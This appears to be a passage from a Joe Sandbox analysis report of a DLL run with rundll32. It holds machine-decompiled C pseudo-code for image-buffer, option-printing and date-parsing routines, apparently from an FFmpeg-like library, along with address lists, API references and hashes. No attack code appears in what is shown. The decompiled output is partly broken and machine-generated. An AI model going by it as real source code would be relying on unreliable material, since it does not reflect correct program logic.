						_t125 = _t165[1] + _t192 - 0x00000001 & _t180;
						_t165[1] = _t125;
						_t198[0xd] = _t125;
						_t129 = _t165[2] + _t192 - 0x00000001 & _t180;
						_t165[2] = _t129;
						_t198[0xe] = _t129;
						_t133 = _t165[3] + _t192 - 0x00000001 & _t180;
						_t165[3] = _t133;
						_t198[0xf] = _t133;
						_t198[3] =  &(_t198[0xc]);
						_t198[2] = _t198[0x1f];
						_t198[1] = _t198[0x20];
						 *_t198 =  &(_t198[0x10]);
						_t138 = L1001EE90(_t165, 0, _t192, _t195, _t211);
						_t195 = _t138;
						if(_t138 < 0) {
							goto L17;
						}
						_t140 = _t192 + _t198[0x10];
						if(_t140 < 0) {
							goto L29;
						}
						_t141 = _t140 + _t198[0x11];
						if(_t141 < 0) {
							goto L29;
						}
						_t142 = _t141 + _t198[0x12];
						if(_t142 < 0) {
							goto L29;
						}
						_t143 = _t142 + _t198[0x13];
						if(_t143 < 0) {
							goto L29;
						}
						 *_t198 = _t143;
						_t144 = E10026230();
						_t190 = _t144;
						if(_t144 == 0) {
							_t195 = 0xfffffff4;
							goto L17;
						}
						_t198[3] = _t144;
						_t198[4] = _t165;
						_t198[2] = _t198[0x1f];
						_t198[1] = _t198[0x20];
						 *_t198 = _t198[0x1c];
						_t148 = L1001EFD0(_t165, _t190, _t192, _t195);
						_t195 = _t148;
						if(_t148 < 0) {
							 *_t198 = _t190;
							L100265B0();
							goto L17;
						}
						if(( *(_t198[0xb] + 8) & 0x00000002) != 0) {
							_t181 =  *(_t198[0x1c] + 4);
							 *_t198 = _t181;
							_t198[1] = _t198[0x20];
							_t198[8] = _t181;
							E1001F0D0();
							__eflags = _t192 - 3;
							_t182 = _t198[8];
							if(_t192 <= 3) {
								_t198[2] = "Formats with a palette require a minimum alignment of 4\n";
								_t198[1] = 0x10;
								 *_t198 = 0;
								L10023A40();
								 *_t198 = _t190;
								L100265B0();
								goto L29;
							}
							__eflags = _t182;
							if(_t182 != 0) {
								_t170 =  *(_t198[0x1c]);
								_t183 = _t182 - _t170;
								_t159 = _t198[0x1f] *  *_t165;
								__eflags = _t183 - _t159;
								if(_t183 > _t159) {
									_t191 = _t170 + _t159;
									_t184 = _t183 - _t159;
									__eflags = _t184 - 8;
									if(_t184 >= 8) {
										__eflags = _t191 & 0x00000001;
										if((_t191 & 0x00000001) != 0) {
											 *_t191 = 0;
											_t184 = _t184 - 1;
											_t191 = _t191 + 1;
										}
										__eflags = _t191 & 0x00000002;
										if((_t191 & 0x00000002) != 0) {
											 *_t191 = 0;
											_t184 = _t184 - 2;
											_t191 = _t191 + 2;
										}
										__eflags = _t191 & 0x00000004;
										if((_t191 & 0x00000004) != 0) {
											 *_t191 = 0;
											_t184 = _t184 - 4;
											_t191 = _t191 + 4;
										}
										_t172 = _t184 >> 2;
										_t184 = _t184 & 0x00000003;
										memset(_t191, 0, _t172 << 2);
										_t198 =  &(_t198[3]);
										_t191 = _t191 + _t172;
									}
									__eflags = _t184 & 0x00000004;
									if((_t184 & 0x00000004) != 0) {
										 *_t191 = 0;
										_t191 = _t191 + 4;
										__eflags = _t191;
									}
									__eflags = _t184 & 0x00000002;
									if((_t184 & 0x00000002) != 0) {
										 *_t191 = 0;
										_t191 = _t191 + 2;
										__eflags = _t191;
									}
									__eflags = _t184 & 0x00000001;
									if((_t184 & 0x00000001) != 0) {
										 *_t191 = 0;
									}
								}
							}
						}
						goto L17;
					}
				}
			}

0x1001f1fb
0x1001f204
0x1001f20e
0x1001f212
0x1001f216
0x1001f21d
0x1001f220
0x1001f225
0x1001f229
0x1001f22b
0x1001f4aa
0x1001f4aa
0x00000000
0x1001f231
0x1001f231
0x1001f23c
0x1001f242
0x1001f248
0x1001f24c
0x1001f253
0x1001f259
0x1001f25e
0x1001f261
0x1001f263
0x1001f269
0x1001f26d
0x1001f26d
0x1001f275
0x1001f279
0x1001f27d
0x1001f280
0x1001f290
0x1001f480
0x1001f480
0x1001f488
0x1001f491
0x1001f49a
0x1001f4a2
0x1001f4a5
0x00000000
0x1001f4a5
0x1001f2aa
0x1001f2ac
0x00000000
0x00000000
0x1001f2d0
0x1001f2d2
0x00000000
0x00000000
0x1001f2db
0x1001f2e0
0x1001f2e0
0x1001f2e3
0x1001f2e3
0x1001f2e5
0x1001f2f0
0x1001f2f3
0x1001f2f7
0x1001f2fc
0x1001f2fe
0x1001f300
0x1001f3ed
0x1001f3f6
0x1001f306
0x1001f30a
0x1001f30f
0x1001f311
0x1001f313
0x1001f31d
0x1001f31f
0x1001f322
0x1001f32c
0x1001f32e
0x1001f331
0x1001f33b
0x1001f33d
0x1001f340
0x1001f348
0x1001f350
0x1001f35b
0x1001f363
0x1001f366
0x1001f36d
0x1001f36f
0x00000000
0x00000000
0x1001f373
0x1001f377
0x00000000
0x00000000
0x1001f37d
0x1001f381
0x00000000
0x00000000
0x1001f387
0x1001f38b
0x00000000
0x00000000
0x1001f391
0x1001f395
0x00000000
0x00000000
0x1001f39b
0x1001f39e
0x1001f3a5
0x1001f3a7
0x1001f537
0x00000000
0x1001f537
0x1001f3ad
0x1001f3b5
0x1001f3b9
0x1001f3c4
0x1001f3cc
0x1001f3cf
0x1001f3d6
0x1001f3d8
0x1001f4b8
0x1001f4bb
0x00000000
0x1001f4bb
0x1001f3eb
0x1001f404
0x1001f40e
0x1001f411
0x1001f415
0x1001f419
0x1001f41e
0x1001f421
0x1001f425
0x1001f510
0x1001f51a
0x1001f522
0x1001f525
0x1001f52a
0x1001f52d
0x00000000
0x1001f52d
0x1001f42b
0x1001f42d
0x1001f435
0x1001f43b
0x1001f43d
0x1001f440
0x1001f442
0x1001f444
0x1001f447
0x1001f449
0x1001f44c
0x1001f4c5
0x1001f4cb
0x1001f4ee
0x1001f4f1
0x1001f4f2
0x1001f4f2
0x1001f4cd
0x1001f4d3
0x1001f503
0x1001f508
0x1001f50b
0x1001f50b
0x1001f4d5
0x1001f4db
0x1001f4f5
0x1001f4fb
0x1001f4fe
0x1001f4fe
0x1001f4e1
0x1001f4e4
0x1001f4e7
0x1001f4e7
0x1001f4e7
0x1001f4e7
0x1001f44e
0x1001f451
0x1001f453
0x1001f459
0x1001f459
0x1001f459
0x1001f45c
0x1001f45f
0x1001f461
0x1001f466
0x1001f466
0x1001f466
0x1001f469
0x1001f46c
0x1001f472
0x1001f472
0x1001f46c
0x1001f442
0x1001f42d
0x00000000
0x1001f3eb
0x1001f300

APIs

mv_pix_fmt_desc_get.MAIN ref: 1001F220
mv_image_get_linesize.MAIN ref: 1001F259

Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976

mv_image_fill_linesizes.MAIN(?), ref: 1001F2F7
mv_image_fill_plane_sizes.MAIN(?), ref: 1001F366
mv_malloc.MAIN(?), ref: 1001F39E
mv_image_fill_pointers.MAIN(?), ref: 1001F3CF

Part of subcall function 1001EFD0: mv_image_fill_plane_sizes.MAIN ref: 1001F040

mvpriv_set_systematic_pal2.MAIN(?), ref: 1001F419

Strings

Picture size %ux%u is invalid, xrefs: 1001F48C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_image_fill_plane_sizesmv_pix_fmt_desc_get$mv_image_fill_linesizesmv_image_fill_pointersmv_image_get_linesizemv_mallocmvpriv_set_systematic_pal2
String ID: Picture size %ux%u is invalid
API String ID: 3240037220-1963597007
Opcode ID: c0da3f089ef4c1a1a8e32dceaedc98ce32d43ce566857b51ffa12b0a32c2eabb
Instruction ID: e23022134abe2078ba7cb28d25bebe71f56db34df5c954ccbe64bd9ec64da2e1
Opcode Fuzzy Hash: c0da3f089ef4c1a1a8e32dceaedc98ce32d43ce566857b51ffa12b0a32c2eabb
Instruction Fuzzy Hash: 55911576A087418FC350DF28C48572BBBE2FF98354F15892DE9A8CB355EB35D9818B42

Uniqueness

Uniqueness Score: -1.00%

Function 1002E2A5 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E1002E2A5(void* __ecx, void* __fp0, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr* _a16, char _a20, signed int _a24) {
				char _v1052;
				char _v1056;
				char _v1057;
				char _v1058;
				signed int _v1059;
				char _v1072;
				signed int _v1076;
				signed int _v1080;
				intOrPtr _v1100;
				char* _v1104;
				char* _v1108;
				void* _v1112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t84;
				void* _t89;
				void* _t96;
				char _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t125;
				signed int _t128;
				intOrPtr _t131;
				signed int _t134;
				signed int _t135;
				intOrPtr* _t136;
				signed int _t137;
				signed int _t139;
				void* _t140;
				intOrPtr* _t141;
				void* _t168;

				_t168 = __fp0;
				_t141 = _t140 - 0x44c;
				_t128 = _a24;
				_t118 = _a20;
				_v1057 = 0;
				_t137 = _a8;
				_t134 = _a12;
				_v1076 = _t128;
				_v1072 = _t118;
				_v1059 = _t128;
				_v1058 = _t118;
				if(_t128 == 0 || _t118 == 0 || (_t128 & 0xffffff00 | _t128 == 0x0000005c | _t128 & 0xffffff00 | _t128 == _t118) != 0 || _t118 == 0x5c) {
					_v1108 = "Invalid separator(s) found.";
					_v1112 = 0x10;
					 *_t141 = _a4;
					L10023A40();
					goto L34;
				} else {
					if(_a4 == 0 || _a16 == 0) {
						L34:
						_t119 = 0xffffffea;
						goto L30;
					} else {
						_t135 = _t134 & 0x00000001;
						_t139 = _t134 & 0x00000002;
						_t120 = 0;
						 *_a16 = 0;
						_v1108 = 0xffffffff;
						_v1112 = 0x40;
						 *_t141 =  &_v1052;
						E10008880(0, _t135, _t137, _t139);
						_v1080 = _t135;
						_t136 = 0;
						_t125 =  *_a4;
						L7:
						while(1) {
							L7:
							while(1) {
								L7:
								while(1) {
									if(_t136 != 0) {
										L23:
										_t131 =  *((intOrPtr*)(_t136 + 0x30));
										if(_t131 == 0) {
											goto L29;
										} else {
											_t136 = _t136 + 0x30;
											goto L11;
										}
									} else {
										L8:
										if(_t125 == 0) {
											if(_t136 != 0) {
												goto L23;
											} else {
												goto L29;
											}
										} else {
											_t136 =  *((intOrPtr*)(_t125 + 8));
											if(_t136 == 0) {
												L29:
												_v1112 = _a16;
												 *_t141 =  &_v1052;
												_t119 =  <=  ? E10009690(_t120, _t125, _t136, _t137) : 0;
												L30:
												return _t119;
											} else {
												_t131 =  *_t136;
												if(_t131 == 0) {
													goto L29;
												} else {
													L11:
													if( *((intOrPtr*)(_t136 + 0xc)) == 0xa) {
														continue;
													} else {
														_t84 =  *(_t136 + 0x28);
														if(_t139 == 0) {
															if((_t84 & _t137) != _t137) {
																continue;
															} else {
																goto L14;
															}
														} else {
															if(_t137 != _t84) {
																continue;
															} else {
																L14:
																if(_v1080 == 0) {
																	L17:
																	_v1112 = _t131;
																	_v1104 =  &_v1056;
																	_v1108 = 0;
																	 *_t141 = _a4;
																	_t89 = L1002AD50(_t120, _t136, _t137, _t139);
																	if(_t89 < 0) {
																		_t122 = _t89;
																		_v1112 = 0;
																		 *_t141 =  &_v1052;
																		E10009690(_t122, 0, _t136, _t137);
																		return _t122;
																	} else {
																		if(_v1056 != 0) {
																			_t96 = _t120;
																			_t120 = _t120 + 1;
																			if(_t96 != 0) {
																				_v1108 = 1;
																				_v1112 =  &_v1076;
																				 *_t141 =  &_v1052;
																				L10008F30();
																			}
																			_v1100 = 0;
																			_v1104 = 1;
																			_v1108 =  &_v1059;
																			_v1112 =  *_t136;
																			 *_t141 =  &_v1052;
																			E10009730();
																			_v1112 =  &_v1072;
																			_v1108 = 1;
																			 *_t141 =  &_v1052;
																			L10008F30();
																			_v1100 = 0;
																			_v1104 = 1;
																			_v1108 =  &_v1059;
																			_v1112 = _v1056;
																			 *_t141 =  &_v1052;
																			E10009730();
																			 *_t141 =  &_v1056;
																			E100265C0();
																		}
																		goto L21;
																	}
																} else {
																	_v1112 = _t136;
																	 *_t141 = _a4;
																	if(L1002DCE0(_t120, _t125, _t136, _t137, _t139, _t168) > 0) {
																		L21:
																		_t125 =  *_a4;
																		if(_t136 == 0) {
																			goto L8;
																		} else {
																			goto L23;
																		}
																	} else {
																		_t131 =  *_t136;
																		goto L17;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									goto L35;
								}
							}
						}
					}
				}
				L35:
			}

0x1002e2a5
0x1002e2b4
0x1002e2ba
0x1002e2c1
0x1002e2c8
0x1002e2cd
0x1002e2d4
0x1002e2db
0x1002e2e1
0x1002e2e5
0x1002e2e9
0x1002e2ed
0x1002e56a
0x1002e56e
0x1002e572
0x1002e575
0x00000000
0x1002e318
0x1002e321
0x1002e57a
0x1002e57a
0x00000000
0x1002e336
0x1002e33f
0x1002e342
0x1002e345
0x1002e347
0x1002e352
0x1002e35b
0x1002e363
0x1002e366
0x1002e372
0x1002e376
0x1002e378
0x00000000
0x1002e380
0x00000000
0x1002e380
0x00000000
0x1002e380
0x1002e382
0x1002e4b0
0x1002e4b0
0x1002e4b5
0x00000000
0x1002e4b7
0x1002e4b7
0x00000000
0x1002e4b7
0x1002e388
0x1002e388
0x1002e38a
0x1002e4d2
0x00000000
0x00000000
0x00000000
0x00000000
0x1002e390
0x1002e390
0x1002e395
0x1002e4e0
0x1002e4e7
0x1002e4ef
0x1002e4fd
0x1002e500
0x1002e50c
0x1002e39b
0x1002e39b
0x1002e39f
0x00000000
0x1002e3a5
0x1002e3a5
0x1002e3a9
0x00000000
0x1002e3ab
0x1002e3ad
0x1002e3b0
0x1002e4c4
0x00000000
0x1002e4ca
0x00000000
0x1002e4ca
0x1002e3b6
0x1002e3b8
0x00000000
0x1002e3ba
0x1002e3ba
0x1002e3c0
0x1002e3df
0x1002e3df
0x1002e3e9
0x1002e3f4
0x1002e3f8
0x1002e3fb
0x1002e402
0x1002e538
0x1002e53c
0x1002e544
0x1002e547
0x1002e558
0x1002e408
0x1002e40e
0x1002e414
0x1002e416
0x1002e41b
0x1002e515
0x1002e51d
0x1002e525
0x1002e528
0x1002e528
0x1002e428
0x1002e430
0x1002e434
0x1002e43a
0x1002e442
0x1002e445
0x1002e453
0x1002e45b
0x1002e45f
0x1002e462
0x1002e469
0x1002e472
0x1002e47a
0x1002e482
0x1002e48a
0x1002e48d
0x1002e496
0x1002e499
0x1002e499
0x00000000
0x1002e40e
0x1002e3c2
0x1002e3c2
0x1002e3cd
0x1002e3d7
0x1002e49e
0x1002e4a7
0x1002e4a9
0x00000000
0x00000000
0x00000000
0x00000000
0x1002e3dd
0x1002e3dd
0x00000000
0x1002e3dd
0x1002e3d7
0x1002e3c0
0x1002e3b8
0x1002e3b0
0x1002e3a9
0x1002e39f
0x1002e395
0x1002e38a
0x00000000
0x1002e382
0x1002e380
0x1002e380
0x1002e380
0x1002e321
0x00000000

APIs

mv_bprint_init.MAIN ref: 1002E366
mv_opt_is_set_to_default.MAIN ref: 1002E3D0
mv_opt_get.MAIN ref: 1002E3FB
mv_bprint_escape.MAIN ref: 1002E445
mv_bprint_append_data.MAIN ref: 1002E462
mv_bprint_escape.MAIN ref: 1002E48D
mv_freep.MAIN ref: 1002E499
mv_bprint_finalize.MAIN ref: 1002E4F2
mv_log.MAIN ref: 1002E575

Strings

Invalid separator(s) found., xrefs: 1002E560

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_escape$mv_bprint_append_datamv_bprint_finalizemv_bprint_initmv_freepmv_logmv_opt_getmv_opt_is_set_to_default
String ID: Invalid separator(s) found.
API String ID: 350117393-2087347751
Opcode ID: ced0a989e3125253dd28f18aa86190e22e38fd0a67e20fb3db2e57ccf5a3ca8b
Instruction ID: be32556558566da91918c2a680401ca33f3fbc8414c6347af4aa08559a4ec22a
Opcode Fuzzy Hash: ced0a989e3125253dd28f18aa86190e22e38fd0a67e20fb3db2e57ccf5a3ca8b
Instruction Fuzzy Hash: 627144B5A497818FD750DF28D48069BBBE5FF89384F85892EE998C3301E735ED048B42

Uniqueness

Uniqueness Score: -1.00%

Function 1002F204 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E1002F204(void* __ebx, void* __edx, void* __eflags) {
				signed int _t204;
				void* _t205;
				signed int _t210;
				signed int* _t217;
				void* _t220;
				void* _t225;
				signed int _t226;
				signed int _t232;
				void* _t239;
				signed int _t242;
				signed int _t245;
				signed int _t246;
				signed int _t248;
				void* _t250;

				__eax = E1004B090(__ebx, __eflags);
				__esp[1] = __edx;
				__esi = __eax;
				__eax = 0xf4240;
				__esp[2] = 0xf4240;
				__eax = 0;
				__edi = __edx;
				__esp[3] = 0;
				 *__esp = __esi;
				__eax = L1008EDE0();
				 *__esp = __ebp;
				__esp[0xe] = __eax;
				__eax = 0x100b4c2e;
				__esp[1] = 0x100b4c2e;
				__esp[0xf] = __edx;
				__eax = L10006B30();
				__eflags = __eax;
				if(__eax == 0) {
					L39:
					_t217 =  *(_t250 + 0xd0);
					 *_t217 = _t246;
					_t217[1] = _t242;
					_t205 = 0;
					goto L40;
				} else {
					__esp[2] = __ebx;
					__eax = "%Y - %m - %d";
					__esp[1] = "%Y - %m - %d";
					 *__esp = __ebp;
					__eax = L1002EC70();
					__eflags = __eax;
					if(__eax != 0) {
						__edi = 0;
						__ebp = __eax;
						__esp[0xb] = 0;
					} else {
						 *__esp = __ebp;
						__eax = "%Y%m%d";
						__esp[2] = __ebx;
						__esp[1] = "%Y%m%d";
						__eax = L1002EC70();
						__eflags = __eax - 1;
						asm("sbb edi, edi");
						__edi = __edi & 0x00000001;
						__eflags = __eax;
						__esp[0xb] = __edi;
						__ebp =  !=  ? __eax : __ebp;
					}
					__eax =  *__ebp & 0x000000ff;
					__eflags = (__al & 0x000000df) - 0x54;
					if((__al & 0x000000df) == 0x54) {
						__ebp =  &(__ebp[1]);
					} else {
						while(1) {
							__eflags = __al - 9 - 4;
							if(__al - 9 <= 4) {
								goto L41;
							}
							__eflags = __al - 0x20;
							if(__al == 0x20) {
								goto L41;
							}
							goto L12;
							L41:
							__ebp =  &(__ebp[1]);
							__eax =  *__ebp & 0x000000ff;
						}
					}
					L12:
					__esp[2] = __ebx;
					__esi = "%H:%M:%S";
					__esp[1] = "%H:%M:%S";
					 *__esp = __ebp;
					__eax = L1002EC70();
					__eflags = __eax;
					__edx = __eax;
					if(__eax != 0) {
						L14:
						__eax =  *__edx & 0x000000ff;
						__ecx = 0;
						__esp[9] = 0;
						__eflags = __al - 0x2e;
						if(__al == 0x2e) {
							__esp[0xa] = 0;
							__ecx = __edx;
							__edx = __ecx[1];
							__eax = __edx;
							__edx = __edx - 0x30;
							__eflags = __edx - 9;
							if(__edx > 9) {
								_t171 =  &(__ecx[1]); // 0x1
								__edx = _t171;
								__ebp = 0;
							} else {
								__ebp = __edx * 0x186a0;
								__edx = __ecx[2];
								__eax = __edx;
								__edx = __edx - 0x30;
								__eflags = __edx - 9;
								if(__edx > 9) {
									_t172 =  &(__ecx[2]); // 0x2
									__edx = _t172;
								} else {
									__ebp =  &(__ebp[__edx]);
									__edx = __ecx[3];
									__eax = __edx;
									__edx = __edx - 0x30;
									__eflags = __edx - 9;
									if(__edx > 9) {
										_t173 =  &(__ecx[3]); // 0x3
										__edx = _t173;
									} else {
										__ebp =  &(__ebp[__edx]);
										__edx = __ecx[4];
										__eax = __edx;
										__edx = __edx - 0x30;
										__eflags = __edx - 9;
										if(__edx > 9) {
											_t174 =  &(__ecx[4]); // 0x4
											__edx = _t174;
										} else {
											__eax = __edx + __edx * 4;
											__edx = __ecx[5];
											__ebp = __ebp + __eax * 4;
											__eax = __edx;
											__edx = __edx - 0x30;
											__eflags = __edx - 9;
											if(__edx > 9) {
												_t175 =  &(__ecx[5]); // 0x5
												__edx = _t175;
											} else {
												__eax = __edx + __edx * 4;
												__edx = __ecx[6];
												__ebp = __ebp + __eax * 2;
												__eax = __edx;
												__edx = __edx - 0x30;
												__eflags = __edx - 9;
												if(__edx > 9) {
													_t176 =  &(__ecx[6]); // 0x6
													__edx = _t176;
												} else {
													__ebp =  &(__ebp[__edx]);
													_t35 =  &(__ecx[7]); // 0x7
													__edx = _t35;
													__ecx = __ecx[7];
													__eax = __ecx;
													__ecx = __ecx - 0x30;
													__eflags = __ecx - 9;
													while(__ecx <= 9) {
														__ecx =  *(__edx + 1);
														__edx = __edx + 1;
														__eax = __ecx;
														__ecx = __ecx - 0x30;
														__eflags = __ecx - 9;
													}
												}
											}
										}
									}
								}
							}
							__esi = __esp[0x36];
							__eflags = __esp[0x36];
							if(__esp[0x36] != 0) {
								__ecx = __edx;
								if(_t204 == 0x6d) {
									__eflags =  *(_t225 + 1) - 0x73;
									if( *(_t225 + 1) != 0x73) {
										goto L63;
									} else {
										_t239 = 0x5a1cac09;
										_t204 =  *(_t225 + 2) & 0x000000ff;
										_t220 = 0xa5e353f7;
										_t226 = 0x3e8;
										_t248 = 0x10624dd3 * _t248 >> 0x20 >> 6;
										goto L31;
									}
								} else {
									if(_t204 == 0x75) {
										__eflags =  *(_t225 + 1) - 0x73;
										if( *(_t225 + 1) == 0x73) {
											__eflags =  *(_t225 + 2);
											if( *(_t225 + 2) != 0) {
												goto L63;
											} else {
												_t245 = 0;
												_t242 = 0;
												goto L35;
											}
										} else {
											goto L63;
										}
									} else {
										if(_t204 == 0x73) {
											_t204 =  *(_t225 + 1) & 0x000000ff;
										}
										goto L30;
									}
								}
								goto L40;
							} else {
								goto L26;
							}
						} else {
							__esp[0xa] = 0;
							__ebp = 0;
							L26:
							__al = __al & 0x000000df;
							__eflags = __al - 0x5a;
							__ecx = __ecx & 0xffffff00 | __al == 0x0000005a;
							__edi = __cl & 0x000000ff;
							__ecx = __esp[0xb];
							__esi = __edx + __edi;
							__edi = __edi | __esp[0xb];
							__eflags = __edi;
							if(__edi != 0) {
								__edx = __esp[0xb];
								__eflags = __esp[0xb];
								if(__esp[0xb] == 0) {
									L50:
									__eax = 0;
									__esp[6] = 0;
									__eax = 0;
									__eflags = 0;
									__esp[7] = 0;
									goto L51;
								} else {
									__eflags = __al - 0x5a;
									__eax =  &(__esp[0xe]);
									__esp[1] =  &(__esp[0xe]);
									__eax =  &(__esp[0x1a]);
									 *__esp =  &(__esp[0x1a]);
									if(__al != 0x5a) {
										__eax =  *0x100aa0c4();
										__eflags = __eax;
										if(__eax != 0) {
											goto L86;
										} else {
											__eax = 0;
											__eflags = 0;
											do {
												__edx =  *(__esp + __eax + 0x68);
												 *(__esp + __eax + 0x8c) =  *(__esp + __eax + 0x68);
												__eax = __eax + 4;
												__eflags = __eax - 0x24;
											} while (__eax < 0x24);
											__eax = __esp[0x11];
											__esp[0x23] = __esp[0x11];
											__eax = __esp[0x12];
											__esp[0x24] = __esp[0x12];
											__eax = __esp[0x13];
											__esp[0x25] = __esp[0x13];
											__eax = 0;
											__eflags = 0;
											do {
												__edx =  *(__esp + __eax + 0x8c);
												 *(__esp + __eax + 0x44) = __edx;
												__eax = __eax + 4;
												__eflags = __eax - 0x24;
											} while (__eax < 0x24);
											goto L28;
										}
									} else {
										__eax =  *0x100aa0c8();
										__eflags = __eax;
										if(__eax != 0) {
											L86:
											__esi = 0;
											__ecx = 9;
											__edi =  &(__esp[0x23]);
											__eax = memcpy( &(__esp[0x23]), 0, 9 << 2);
											__edi = 0 + __ecx;
											__edi =  &(__ecx[0 + __ecx]);
											__ecx = 0;
											asm("ud2");
											_push(__ebp);
											_push(__edi);
											_push(0);
											_push(__ebx);
											__esp = __esp - 0xac;
											__ecx = __esp[0x33];
											__edi = __esp[0x30];
											__eax =  *__ecx & 0x000000ff;
											__eflags = __al - 0x3f;
											if(__al == 0x3f) {
												__eax = __ecx[1] & 0x000000ff;
												__ecx =  &(__ecx[1]);
												__eflags = __ecx;
											}
											__esi = __esp[0x31];
											__ebx =  &(__esp[8]);
											__esi = __esp[0x31] - 1;
											__eflags = __al;
											__esp[7] = __esp[0x31] - 1;
											__esi = __esp[0x32];
											if(__al == 0) {
												L100:
												__edx = __ebx;
												__eflags = __al - 0x3d;
												 *__ebx = 0;
												__ebp = __ecx;
												__edx = __edi;
												if(__al == 0x3d) {
													goto L102;
												}
											} else {
												L90:
												__eflags = __al - 0x3d;
												__edx = __ebx;
												if(__al == 0x3d) {
													goto L100;
												} else {
													while(1) {
														__eflags = __al - 0x26;
														if(__al == 0x26) {
															break;
														} else {
															goto L93;
														}
														while(1) {
															L93:
															__edx = __edx - __ebx;
															__eflags = __edx - __ebx - 0x7e;
															if(__edx - __ebx <= 0x7e) {
																break;
															}
															__eax = __ecx[1] & 0x000000ff;
															__ecx =  &(__ecx[1]);
															__eflags = __al;
															if(__al == 0) {
																L96:
																 *__edx = 0;
																__eflags = __al - 0x3d;
																__ebp = __ecx;
																__edx = __edi;
																if(__al == 0x3d) {
																	L102:
																	__eax =  &(__ecx[1]);
																	__ecx = __ecx[1] & 0x000000ff;
																	__eflags = __cl;
																	if(__cl == 0) {
																		L124:
																		__edx = __edi;
																		__ebp = __eax;
																	} else {
																		__eflags = __cl - 0x26;
																		if(__cl == 0x26) {
																			goto L124;
																		} else {
																			__esp[0x32] = __esi;
																			while(1) {
																				__esi = __esp[7];
																				__edx = __edx - __edi;
																				__eflags = __edx - __edi - __esp[7];
																				if(__edx - __edi >= __esp[7]) {
																					break;
																				}
																				__eflags = __cl - 0x2b;
																				if(__cl == 0x2b) {
																					__cl = 0x20;
																				}
																				 *__edx = __cl;
																				__ebp = __edx + 1;
																				__eax = __eax + 1;
																				__ecx =  *__eax & 0x000000ff;
																				__eflags = __cl;
																				if(__cl == 0) {
																					L123:
																					__edx = __ebp;
																					__esi = __esp[0x32];
																					__ebp = __eax;
																				} else {
																					__eflags = __cl - 0x26;
																					if(__cl == 0x26) {
																						goto L123;
																					} else {
																						__edx = __ebp;
																						continue;
																					}
																				}
																				goto L97;
																			}
																			__ebp = __eax + 1;
																			__eax =  *(__eax + 1) & 0x000000ff;
																			__esi = __esp[0x32];
																			__eflags = __al - 0x26;
																			if(__al != 0x26) {
																				__eflags = __al;
																				if(__al != 0) {
																					while(1) {
																						__eax = __ebp[1] & 0x000000ff;
																						__ebp =  &(__ebp[1]);
																						__eflags = __al;
																						if(__al == 0) {
																							break;
																						}
																						__eflags = __al - 0x26;
																						if(__al != 0x26) {
																							continue;
																						}
																						goto L97;
																					}
																				} else {
																				}
																			}
																		}
																	}
																}
															} else {
																__eflags = __al - 0x3d;
																if(__al == 0x3d) {
																	goto L96;
																} else {
																	__eflags = __al - 0x26;
																	if(__al != 0x26) {
																		continue;
																	} else {
																		goto L115;
																	}
																}
															}
															goto L97;
														}
														 *__edx = __al;
														__eax = __ecx[1] & 0x000000ff;
														__ecx =  &(__ecx[1]);
														__ebp = __edx + 1;
														__edx = __edx + 1;
														__eflags = __al - 0x3d;
														if(__al == 0x3d) {
															goto L96;
														} else {
															__eflags = __al;
															if(__al != 0) {
																continue;
															} else {
																goto L96;
															}
														}
														goto L97;
													}
													L115:
													 *__edx = 0;
													__ebp = __ecx;
													__edx = __edi;
												}
											}
											L97:
											 *__edx = 0;
											__eax = strcmp(__ebx, __esi);
											__eflags = __eax;
											if(__eax == 0) {
												__esp =  &(__esp[0x2b]);
												__eax = 1;
												_pop(__ebx);
												_pop(__esi);
												_pop(__edi);
												_pop(__ebp);
												return 1;
											} else {
												__eflags =  *__ebp - 0x26;
												if( *__ebp != 0x26) {
													__esp =  &(__esp[0x2b]);
													__eax = 0;
													__eflags = 0;
													_pop(__ebx);
													_pop(__esi);
													_pop(__edi);
													_pop(__ebp);
													return 0;
												} else {
													__eax = __ebp[1] & 0x000000ff;
													__ecx =  &(__ebp[1]);
													__eflags = __al;
